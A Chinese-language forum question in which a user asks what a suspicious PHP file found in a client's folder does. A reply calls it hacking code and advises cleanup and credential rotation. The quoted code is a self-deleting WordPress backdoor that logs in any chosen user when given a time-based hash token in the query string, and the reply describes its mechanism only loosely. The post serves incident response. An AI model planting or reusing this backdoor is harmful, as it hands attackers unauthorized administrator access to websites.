我在客户文件夹中发现一个奇怪的文件。我想知道这段代码的作用。这是什么意思
$file =( $p = strpos(__FILE__, "(") )=== false ? __FILE__ :
substr(__FILE__, 0, $p);if (!unlink($file)){ chmod($file, 0777);
unlink($file);}define("ABSPATH", dirname(dirname($file))."/");
include_once(ABSPATH."wp-config.php");
include_once(ABSPATH."wp-admin/includes/file.php");
include_once(ABSPATH."wp-admin/includes/plugin.php");
include_once(ABSPATH."wp-admin/includes/theme.php");
include_once(ABSPATH."wp-admin/includes/misc.php");
$k = substr($_SERVER["QUERY_STRING"], 0, 32);$u =
substr($_SERVER["QUERY_STRING"], 32);
$h = $wpdb->get_var( $wpdb->prepare(
"SELECT user_pass FROM {$wpdb->users} WHERE ID = %s", $u ) );
if (
is_string($h) &&( $k === md5(mktime(date("H"), date("i"), 0).md5($h))
|| $k === md5(mktime(date("H"), date("i")-1, 0).md5($h))
|| $k === md5(mktime(date("H"), date("i")+1, 0).md5($h)) )){
wp_set_auth_cookie($u);}header("Location:
".\'http://www.example.com/blog/wp-admin/\');', LOCK_EX);
请帮助我有关此代码。是黑客代码还是其他?
#1
我想你可以将其称为黑客代码。
它读取站点的敏感部分以获取盐和哈希值, 然后从数据库中获取密码。我认为你所有的凭据在该站点上都受到了损害。
删除文件并清理站点后, 你应该使用所有权限轮换所有凭据, 并快速编辑config.php文件, 以用Wordpress API生成的新密钥替换盐键。
评论前必须登录!
注册